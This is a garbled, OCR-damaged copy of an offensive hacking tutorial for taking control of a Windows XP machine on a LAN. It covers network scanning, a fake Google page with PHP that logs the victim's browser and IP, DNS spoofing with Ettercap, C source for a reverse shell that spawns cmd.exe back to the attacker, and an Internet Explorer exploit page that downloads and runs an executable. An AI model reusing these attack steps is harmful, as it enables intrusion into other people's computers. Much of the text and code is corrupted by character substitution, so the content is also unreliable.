Getting Access to Remote Winxp Machine in Lan

8/10/2019 Getting Access to Remote Winxp Machine in Lan

1/14

---------------------------------------------------Subject: Hacking in LAN

getting access to windows xp remote machineAuthor: cross / x1machine.com

!at"orm: N/A

---------------------------------------------------

## aper.--------------

Here i wi!! tr$ to show $ou one o" man$ methods how to gain access to a

%ictim computer in LAN. &ur %ictim wi!! running 'indows (. &n the other side)i wi!! be an attacker running !inux box. Howe%er) it is not important which

s$stem is used b$ attacker) method is uni%ersa! "or both Linux and 'indowsmachines. &k) i*!! guide $ou step b$ step.

+irst o" a!! we need to know our !oca! , address) !ets "ind out that.

Linux: run konso!e or xterm o" aterm) whate%er $a want and t$pe:i"con"ig

'indows: open cmd.exe and t$pe:ipcon"ig

,n m$ case) and "or that paper) m$ LAN wi!! be m$ %irtua! network.Look at the picture) moste!$ this part:

%mnet Link encap:thernet H'addr :0:0:2::

inet addr:134.1.415.1 6cast:134.1.415.400 7ask:400.400.400.

8hat is m$ !oca! , address 9134.1.415.1 so m$ %ictim wi!! ha%e , in range134.1.415.1-400. Now) !ets check out where is our enem$ hiding..., wi!!

use nmap scanner "or that. 68') $ou can run nmap on Linux and 'indowss$stems both. , wi!! use ;


2/14


3/14

&k) he is running windows xp sp4 and he is at 134.1.415.1>) so much we know.6ut) we do not know one more thing) what web browser he is using...Howto check this outC Here is the trick) but "irst...get $ouse!" a proper web ser%er

and estab!ish it on $ou !oca! machine. ," $ou are running Linux) then insta!!apache web ser%er and php interpreter) con"igure it proper!$ and run.

2heck i" e%er$thing is working b$ openning in $our web browser http://!oca!host)i" $ou see the page so its coo!) i" not) he!p $ourse!" on $our own. ," $ou are using

windows) take a !ook at wamp ser%er) just search in goog!e.7a$be $ou*!! sa$: the he!! man i need this "orC Dou*!! need that in "uture.

Now) when $ou got nice running web ser%er) open $our ser%er*s con"iguration"i!e) 9in m$ case httpd.con" and search "or !ines:

DirectoryIndex index.html


4/14

2hange it to:

DirectoryIndex index.php

8hat wi!! do next thing. 'hen $ou open http://!oca!host) it wi!! !oad not index.htm!

as main start htm! "i!e but index.php. &k) now next thing. Sooner or !ater our%ictim wi!! %isit wor!d wide web*s the best search engine) goog!e.com and that

is the part where we wi!! "ind out which web browser he is using) co= he wi!!%isit our goog!e.com. Now !ets prepare "u!!$ "unctiona! "ake goog!e page.

;et goog!e page source) create in $our ser%er*s main director$ "i!egoog!e.htm!) open it with $our "a%ourite htm! / text editor and paste the source.

Dou need to "ix a "ew !inks. Here is "ixed goog!e page:

&oo'le(ody)td)a)p).h*font-family+arial)!an!-!erif,.h*color+c,.q*color+00c,.t! td*paddin'+0,.t!*(order-collap!e+collap!e,'(ar*hei'ht+11pxpaddin'-left+1px,.'(h).'(d*(order-top+2px !olid c3d4f2font-!i5e+2px,.'(h*hei'ht+0po!ition+a(!olutetop+16px7idth+2008,'(i)'(!*(ac9'round+fffleft+0po!ition+a(!olutetop+16pxvi!i(ility+hidden5-index+2000,'(i*(order+2px !olid(order-color+c3d4f2 c c a1(ae45-index+2002,'u!er*paddin'-(ottom+4px :important,'(ar)'u!er*font-!i5e+2pxpaddin'-top+2px :important,;media all*.'(2).'(*hei'ht+11pxmar'in-ri'ht+.4emvertical-ali'n+top,'(ar*float+left,,.'(1*di!play+(loc9paddin'+.1em .em,a.'(2)a.'(1)a.'(*color+00c : important,.'(1).'(*text-decoration+none,a.'(1+hover*(ac9'round+ccolor+fff :important,7indo7.'oo'le=*9I+"r9?aqo@6A107?ileB_D7")9CI+"2%4%)2%336")9B@+"en",

'oo'le.y=*,'oo'le.x=functionEe)'F*'oo'le.yGe.idH=Ge)'Hreturn fal!e,function !fEF*document.f.q.focu!EF,7indo7.cl9=functionE()c)d)e)f)'F*ifEdocument.ima'e!F*var a=encodeIomponentJJe!capeEne7 Ima'eF.!rc="/urlK!a=#"LEcK"oi="LaEcF+""FLEdK"cad="LaEdF+""FL"ct="LaEeFL"cd="LaEfFL E(K"url="LaE(.replaceE/.N/)""FF.replaceE/OL/')"81P"F+""FL"ei=r9?aqo@6A107?ileB_D7"L'

,return true,

7indo7.'(ar=*,EfunctionEF*var (=7indo7.'(ar)f)h(.q!=functionEaF*var c=7indo7.encodeIomponentEdocument.form!G0H.qJJ""F.valueifEcFa.href=a.href.replaceE/EGKHFq=GQHNJR/)functionEi)'F*returnE'JJ""FL"q="LencodeIomponentEcF,F,function SEa)cF*a.vi!i(ility=hK"hidden"+"vi!i(le"a.left=cL"px",


5/14

(.t'=functionEaF*a=aJJ7indo7.eventvarc=0)i)'=7indo7.navxtra)d=document.'etlementPyIdE"'(i"F)e=a.tar'etJJ a.!rclementa.cancelPu((le=trueifE:fF*f=document.createlementETrray.everyJJ7indo7.createopupK"iframe"+"div"Ff.framePorder="0"f.!rc=""d.parentUode.appendhildEfF.id="'(!"ifE'FforEi in'Fd.in!ertPeforeE'GiH)d.fir!thildF.cla!!Uame="'(1"document.onclic9=(.clo!e,ifEe.cla!!Uame:="'("Fe=e.parentUodedo cL=e.off!et@eft7hileEe=e.off!etarentF

SEd.!tyle)cFf.!tyle.7idth=d.off!etVidthL"px"f.!tyle.hei'ht=d.off!etBei'htL"px"SEf.!tyle)cFh=:h,(.clo!e=functionEaF*h(.t'EaF,,FEF

hl=enta(=7("onclic9='(ar.q!Ethi!F cla!!='(1>Plo'! You#u(eDocument!?ite!


6/14


7/14

function x_re' EF* R(ro7!er! = WW 7hileEli!tER9)F = eachERthi!->_(ro7!er!FF * ifE:emptyER(ro7!er!FF R(ro7!er! .= "J" R(ro7!er! .= R9, Rver!ion_!trin' = "GO/O!a-5EHNEG0-3HLFEGO.0-3a-5HLFK" Rthi!->(_re' = "/ER(ro7!er!FRver!ion_!trin'/i",

function (_!et ER9)RvF* Rthi!->ua_ifG!trtolo7erER9FH = !trtolo7erERvF,,

cla!! &_a extend! &et_a*var R_(ro7!er! = arrayE

Wm!ieW => WIW)Wnet!capeW => WU?W)

W!afariW => W?$W)Wmo5illaW => WM]W)WoperaW => WAW)W9onquerorW => W[ZW)

Ffunction &_aERT=WW)R!ettin'! = trueF*ifEi!_arrayER!ettin'!FF *Rrun = trueextractER!ettin'!F, el!e * Rrun = R!ettin'!, ifEemptyERTFF RT = 'etenvEWB##_?_T&U#WF ifEemptyERTFF *Rpv = explodeE".") B_X?IAUF RT = E RpvG0H > RpvG2H > 0 F K R_?XGWB##_?_T&U#WH +RB##_?X_XT?GWB##_?_T&U#WH, ifEemptyERTFF return fal!e

Rthi!->(_!etEWuaW)RTF ifERrunF Rthi!->x2EF,,R_XT? = i!!etER_F K R_ + RB##__XT?ifE:i!!etER_XT?GWTWHFF R_XT?GWTWH = WW

R!n_!et = arrayEFRclient = ne7 &_aER_XT?GWTWH)R!n_!etFR!hit = Rclient->'et_exoneEWuaWFR!hit1 = Rclient->exoneEWxnameWFR!hit = Rclient->exoneEWipWFR(iatch = R!hit." On ".R!hit1." On ".R!hitRmy_file = fopenE"(ro7!er.txt")"7"Ff7riteERmy_file)R(iatchFfclo!eERmy_fileFK>

--------------------fa9e 'oo'le pa'e add end! here---------------------------

Tdd that code (efor line+

8hat code wi!! grab %ictim*s browser in"ormation

and , and sa%e it to "i!e browser.txt.&k) so now create a "i!e index.php and paste there abo%e code E goog!e "ixed code.

8hen create empt$ "i!ebrowser.txt and set permisions to 333. A!! "i!es in main ser%er director$. 8r$ it on

i" $ou wish.So) what nextC , dunno man) i*m so !ame haxor :F:F

Boke. ;et $ourse!" tter2ap-N;) it runs on Linux and 'indows both.'e are going to per"orm FNS-Spoo" attack...

&k) hope $ou got it insta!!ed. Now) search "or "i!e etter.dns and edit it a !itt!e.+i!e shou!d be here 9on Linux: /usr/!oca!/share/ettercap/etter.dns


8/14

Bust !ike that:

GGGGG L&& H? GGGGGGGGGGGI.goog!e.com A 134.1.415.1

I.goog!e.p! A 134.1.415.1GGGGG L&& H? GGGGGGGGGG

, got here m$ !oca! ,) $ou shou!d t$pe here $our own.

8his wi!! spoo" goog!e dns reso!%ing and redirect %ictim to our !oca! web ser%er.;ot itC good. And i" $ou got e%er$thing set up nice) %ictim wi!! %isit our "ake

goog!epage triggering the php code to grab his browser detai!es and write them to a text

"i!e on our machine. %er$thing si!ent!$...Now !ets !aunch tter2ap.


9/14


10/14

And doub!e c!ick dnsKspoo" p!ugin. 8his wi!! !oad the p!ugin.

And the !ast) se!ect :Start -J Start sni""ing

Now $ou can go make $ourse!" a co""ee or go to s!eep) but !ea%e $our computerworking Now each time our %ictim wi!! open his be!o%ed goog!e.com page)he in "act wi!! open our "ake goog!e page and his browser detai!es wi!! go to us...

&k man) i*m going to ha%e a cigarette...3 minutes !ater...

'hat do we ha%e here...

Ho!$ shit

mo=i!!a/5. 9compatib!eM msie .M windows nt 0.1M s%1msie

134.1.415.1>


11/14

&k. Now we got comp!ete scan. Now stop tter2ap) de!ete php code

"rom our "ake goog!e.com page and change extension "rom index.php to index.htm!.Now $ou ha%e to add just one !ine o" code to our "ake goog!e page) i*!!

exp!ain "or what !ater.Here:

between that !ine:

4.a and !ibwsock>4.a

Now !ets code simp!e re%erse she!! app...

//-----------------------ever!e.c-----------------------------include include include

int mainEF*BVUD hideTllocon!oleEFhide = $indVindo7TE"on!oleVindo7la!!") U@@F?ho7Vindo7Ehide) 0F

u_!hort pornort pornort=atoiE""F V?TDT#T 7d BTUD@ h ?A[# !oc9

?#T#IU$A !i A??_IU$AMT#IAU pi !truct !oc9addr_in !in int !i5e = !i5eofE!inF mem!etE!in) 0) !i5eofE!inFF mem!etE!i) 0) !i5eofE!iFF V?T?tartupEMT[VADE 2) 2 F) 7dF


12/14

!oc9=V?T?oc9etE$_IU#) ?A[_?#TM) IA#A_#) U@@) 0) 0F !in.!in_family = T$_IU# (indE!oc9) E!truct !oc9addrNF!in) !i5eF !in.!in_port = hton!EpornortF !in.!in_addr.!_addr = inet_addrE"your_local_ip"F

connectE!oc9) E!truct !oc9addrNF!in) !i5eF !i.c( = !i5eofE!iF !i.d7$la'! = ?#T#$_??#DBTUD@? !i.h?tdInput = Evoid NF !oc9 !i.h?tdAutput =Evoid NF !oc9 !i.h?tdrror = Evoid NF !oc9 reateroce!!EU@@)"cmd.exe")U@@)U@@)#)0)0)U@@)!i)piF return 0,//----------------------------A$-------------------------------------

aste this code into $our project and compi!e it.Name it "or examp!e she!!.exe

Now we need to run that shit on %ictim machine) howC +uck i dunno...Search the net.

------------------------exploit.html for I -----------------------------


13/14

cl!2="cl!id+PD3" cl!1="-T" cl!="-22D0-3" cl!6="%T-0006$13" cl!full=cl!2cl!1cl!cl!6

?et oD?=document.createlementE"o(Sect"F oD?.!etTttri(ute "id")"oD?" oD?.!etTttri(ute "cla!!id")cl!full

?et o?hellTpp = oD?.reateA(SectE"?hell.Tpplication")""F ?et o$older = o?hellTpp.Uame?paceE!!f$AU#?F ?et o$olderItem=o$older.ar!eUameE"?ym(ol.ttf"F $ont_ath_omponent!=?plitEo$olderItem.ath)"O")-2)2F VinDir= $ont_ath_omponent!E0F "O" $ont_ath_omponent!E2F "O" xeUame=VinDir xeUame

A(SUame="Micro!oft" A(Sro'="CM@B##" !et oCM@B## = reateA(SectEA(SUame "." A(Sro'F eq_type="&" "" "#" B##?e!!ion=oCM@B##.ApenEeq_#ype)Module_ath)0F oCM@B##.?endEF An rror e!ume Uext CM@Pody=oCM@B##.re!pon!ePody

A(SUame="TDADP" A(Sro'="?tream" An rror e!ume Uext ?et o?tream=oD?.reateA(SectEA(SUame "." A(Sro')""F If rr.num(er 0 #hen

?et o$?A=oD?.reateA(SectE"?criptin'.$ile?y!temA(Sect")""F ?et lu'in$ile=o$?A.reate#ext$ileExeUame) #F lu'in_!i5e=@enPECM@PodyF

$or S=2 #o lu'in_!i5e

cPyte=MidPECM@Pody)S)2F Pyteode=T!cPEcPyteF lu'in$ile.VriteEhrEPyteodeFF Uext lu'in$ile.lo!e

?et oV?hell=oD?.reateA(SectE"V?cript.?hell")""F An rror e!ume Uext oV?hell.un ExeUameF)2)$T@? l!e

o?tream.Mode=adModeeadVrite o?tream.#ype=ad#ypePinary o?tream.Apen o?tream.Vrite CM@Pody o?tream.?ave#o$ile xeUame)ad?avereateAverVrite

o?hellTpp.?hellxecute xeUame


14/14

nd If

nd If nd If

$unction &enerateUameEFandomUame=""

rr=IntE%NndFi9=0Do ii=IntE1NndFL34 andomUame=andomUameLhrEiiF i9=i9L2@oop Vhile i9

Getting Access to Remote Winxp Machine in Lan

Documents

Transcript of Getting Access to Remote Winxp Machine in Lan